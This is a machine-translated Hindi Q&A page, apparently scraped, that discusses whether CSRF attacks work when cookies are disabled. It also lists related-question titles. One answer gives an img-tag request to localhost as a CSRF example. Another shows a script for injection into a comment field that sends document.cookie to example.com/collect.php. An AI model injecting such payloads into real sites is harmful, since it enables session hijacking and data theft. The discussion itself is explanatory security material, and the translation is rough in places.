मैं कुछ समय से इसकी जांच कर रहा हूं, लेकिन मुझे अपनी जिज्ञासा को पूरा करने के लिए कुछ भी नहीं मिला है। कुकीज अक्षम होने पर, सीएसआरएफ हमले का शिकार होने के लिए, उपयोगकर्ता के रूप में यह संभव है। स्पष्ट रूप से सीएसआरएफ उपयोगकर्ता ब्राउज़र पर वैध सर्वर पर जाली अनुरोध के साथ उपयोगकर्ता के प्रमाण पत्र भेजने के लिए निर्भर करता है। आईपी पते के अलावा, ब्राउज़र स्वचालित रूप से किसी अन्य सत्र मूल्य में नहीं भेजते हैं? उस स्थिति में, जब तक कोई उपयोगकर्ता कुकीज़ अक्षम के साथ लॉगिन कर सकता है, तब तक वे कमजोर वेबसाइटों पर भी सीएसआरएफ से सुरक्षित रहेंगे।क्या सीएसआरएफ कुकीज़ के बिना संभव है?
उत्तर
तो, आपको खुद से पूछना है कि सर्वर एक क्लाइंट को दूसरे से कैसे जानता है? अधिकांश मामलों में, यह सत्र कुकी है, लेकिन अन्य तरीके भी हैं।
एक व्यवस्थापक अनुप्रयोग पर विचार करें, जो केवल स्थानीयहोस्ट से उपयोग किए जाने पर काम करने के लिए कॉन्फ़िगर किया गया है। यहां, सर्वर ब्राउज़र के आईपी पते पर भरोसा कर रहा है। अब, यदि कोई हमलावर <img src="http://localhost/do/something/harmful"/>
जैसे पृष्ठ बनाता है, और किसी भी तरह से व्यवस्थापक को अपने पृष्ठ पर जाने के लिए मिलता है, तो आपके पास एक सीएसआरएफ है।
अन्य उदाहरणों में एचटीपी मूल और पाचन प्रमाणीकरण का दुरुपयोग शामिल है, क्योंकि ब्रूनो ने पहले ही बताया है।
ज़रूर - बस लगता है कि अगर संक्रमित साइट साफ़ एचटीएमएल नहीं किया है और आप "टिप्पणी" फ़ील्ड में निम्न पाठ दर्ज किया गया:
<script>
var img = document.createElement("img");
img.src = "http://example.com/collect.php?val=" + escape(document.cookie);
</script>
मूल रूप से
आप जावास्क्रिप्ट का उपयोग कर रहे कुकीज़ को इकट्ठा करने और लेखन एक छवि टैग के यूआरएल पैरामीटर में मान ताकि वे "खराब" सर्वर के साथ पारित हो जाएं जब ब्राउजर छवि लोड करने का प्रयास करता है।
बेशक - ऊपर दिए गए उदाहरण में मैं "document.cookie" से कुकीज़ का उपयोग कर रहा हूं लेकिन आपके प्रश्न की भावना में "यदि कुकीज़ अक्षम हैं" तो डीओएम से किसी अन्य जानकारी को निकालना उतना ही आसान है (छुपा इनपुट फ़ील्ड मान, इत्यादि) और उन्हें अपने लक्षित सर्वर पर यूआरएल में भेजें।
ब्राउज़र द्वारा समर्थित प्रमाणीकरण के अन्य रूप हैं, विशेष रूप से HTTP बेसिक और HTTP डाइजेस्ट, साथ ही एसएसएल/टीएलएस क्लाइंट-प्रमाणपत्र। दुर्भाग्यवश, इन तंत्रों का उपयोग करते समय "लॉग आउट" करने के लिए इंटरफ़ेस आमतौर पर काफी खराब होता है। कुकीज़ और रूपों के विपरीत, क्रेडेंशियल का उपयोग करने के लिए रोकना ब्राउज़र द्वारा नियंत्रित होता है (सर्वर और इसकी कुकीज़ द्वारा नहीं), लेकिन सामान्य रूप से कुछ उन्नत मेनू में बटन सबसे अच्छे होते हैं (यदि वे बिल्कुल मौजूद हैं)।
है, इसलिए यदि कोई उपयोगकर्ता अपने ब्राउज़र में कुकीज़ अक्षम करता है, तो सामान्य विकल्प HTTP प्रमाणीकरण हैं या बस सत्र आईडी को फॉर्म के माध्यम से पास कर रहे हैं? – grossmae
- 1. सीएसआरएफ भेद्यता/कुकीज़ प्रश्न
- 2. क्या सबडोमेन कुकीज़ को हटाना संभव है?
- 3. क्या कुकीज़ सुरक्षित करना संभव है?
- 4. डीजेगो सीएसआरएफ फॉर्म के बिना टोकन
- 5. कुकीज़ के बिना PHP सत्र
- 6. सीएसआरएफ टोकन के बिना फॉर्म: जोखिम क्या हैं
- 7. सीएसआरएफ ब्राउज़र सुरक्षा समस्या नहीं है?
- 8. सीएसआरएफ संरक्षण वास्तव में क्या है?
- 9. UIWebView के बिना जावास्क्रिप्ट चलाएं संभव है?
- 10. क्या संपूर्ण डेटासेट के बिना पेजरैंक करना संभव है?
- 11. $ के बिना परिवर्तनीय, क्या यह संभव हो सकता है?
- 12. क्या AVURLAsset फ़ाइल एक्सटेंशन के बिना काम करना संभव है?
- 13. क्या स्ट्रीमिंग के बिना HttpRequest पैरामीटर पढ़ना संभव है?
- 14. क्या ऐप्पल उत्पादों के बिना आईफोन ऐप बनाना संभव है?
- 15. क्या सी # में कक्षा के बिना ऑब्जेक्ट बनाना संभव है?
- 16. क्या रूट निजीकरण के बिना मोंगोड स्थापित करना संभव है?
- 17. एक फॉर्म के बिना कोडनिर्देशक सीएसआरएफ टोकन प्राप्त करना?
- 18. क्या एक्सएसएस हमले के लिए केवल कुकीज़ प्राप्त करने के लिए यह संभव है?
- 19. क्या सीएसआरएफ हमले एपीआई पर लागू होते हैं?
- 20. क्या यह Django की सीएसआरएफ सुरक्षा कैसे काम करता है?
- 21. क्या एचटीटीपीएस सीएसआरएफ हमलों के खिलाफ सुरक्षा करता है?
- 22. सीएसआरएफ टोकन
- 23. सीएसआरएफ सुरक्षा को अक्षम किए बिना रेल एपीआई डिज़ाइन
- 24. कुकीज़
- 25. Django में अजाक्स सीएसआरएफ समस्या 1.3
- 26. क्या मूल डेटा दिखाए बिना व्यवस्थापक इनलाइन होना संभव है?
- 27. सीएसआरएफ सुरक्षा
- 28. सीएसआरएफ सुरक्षा प्रश्न
- 29. क्या फैंटॉमजेएस कुकीज़ का समर्थन करता है?
- 30. क्या सीएसआरएफ हमलों के लिए जेएसओएन वेब सेवाएं कमजोर हैं?
आईएमओ, जब तक पीड़ित के ब्राउज़र में एक सक्रिय सत्र या सक्रिय पहुंच टोकन (वेबस्टॉरेज, कुकीज़, रैम, या अन्य के माध्यम से) होता है, तो सीएसआरएफ यह मानने के माध्यम से जाएगा कि साइट सीएसआरएफ को रोकने के उद्देश्य से सिंक टोकन का उपयोग नहीं करती है। – Zack